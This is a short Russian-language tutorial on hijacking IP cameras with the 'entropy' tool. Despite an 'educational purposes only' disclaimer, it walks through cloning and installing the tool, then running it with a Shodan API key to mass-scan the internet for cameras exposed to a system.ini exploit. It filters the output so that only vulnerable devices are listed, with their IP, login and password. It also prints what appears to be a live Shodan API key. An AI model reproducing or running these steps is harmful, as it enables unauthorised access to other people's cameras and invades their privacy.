Взлом камер без брутфорса
Статья исключительно в образовательных целях и не призывает к действиям!
Чтобы проверить СВОЮ камеру на устойчивость к эксплоиту system.ini, я воспользовался Kali Linux (хотя можно и не только им).
Для начала клонируем репозиторий entropy:
git clone https://github.com/entynetproject/entropy.git
Переходим в каталог с утилитой:
cd entropy
Назначаем права на запуск установщика:
chmod +x install.sh
И устанавливаем саму утилиту:
./install.sh
Но у меня без установки зависимостей утилита не захотела работать, поэтому мне пришлось вводить такую команду. В вашем случае, возможно, придется вводить pip или pip2, если будут ошибки. Это зависит от версии python, которую вы будете использовать.
pip3 install -r requirements.txt
Теперь регистрируемся в shodan, и получаем API ключ. После этого, запускаем саму утилиту, указав свой API ключ Shodan:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T"
А для фильтрации вывода (чтобы у нас отображался список только уязвимых камер), мы воспользуемся утилитой grep:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T" | grep [+]
В результате вы увидите IP, логин и пароль уязвимой камеры